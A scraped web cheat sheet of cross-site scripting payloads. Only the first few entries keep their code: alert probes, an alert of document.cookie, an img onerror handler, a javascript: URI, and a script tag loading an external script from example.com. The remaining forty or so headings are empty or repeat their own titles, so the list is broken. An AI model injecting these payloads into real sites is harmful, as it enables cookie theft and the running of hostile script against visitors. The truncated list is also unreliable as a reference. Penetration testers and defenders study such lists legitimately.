⛑️Crafting XSS Payloads
Basic Alert:
<script>alert('XSS')</script>Document Cookie Access:
<script>alert(document.cookie)</script>JavaScript Execution:
<img src=x onerror=alert('XSS')>Using JavaScript URI:
javascript:alert('XSS')Executing Code from External Source:
<script src="<http://example.com/xss.js>"></script>HTML Injection:
<div onclick="alert('XSS')">Click me</div>Event Handler:
Using SVG:
Embedding in Style Tags:
Using Iframe:
Non-Alpha-Non-Digit XSS:
Using document.domain:
Using HTML Entities:
Breaking out of HTML Attributes:
Using eval():
eval():Breaking out of URL Parameters:
Using Base64:
Exploiting innerHTML:
Using setTimeout:
setTimeout:UTF-8 Encoded Payloads:
Using Object Tags:
Using Embed Tags:
Utilizing onmouseover:
onmouseover:Using onfocus:
onfocus:Utilizing onerror with Invalid Image Source:
onerror with Invalid Image Source:Malformed HTML Tags:
Using srcdoc in Iframe:
srcdoc in Iframe:Exploiting onload in Body Tag:
onload in Body Tag:Encoding with Decimal HTML Entities:
Using data: URI:
data: URI:Using Unicode:
Breaking Out of Script Context:
Using onerror with Script Tags:
onerror with Script Tags:Using MathML:
Exploiting ContentEditable:
Using document.write:
document.write:Exploiting ondblclick:
ondblclick:Using VBScript in IE:
Utilizing execScript in IE:
execScript in IE:Using XML Entities:
Exploiting onblur:
onblur:Using onchange:
onchange:Using onsubmit:
onsubmit:Breaking Out of CSS Context:
Using Frame Source:
Utilizing document.domain with iframe:
document.domain with iframe:Exploiting onresize:
onresize:Using onclick:
onclick:Exploiting href with JavaScript:
href with JavaScript:Last updated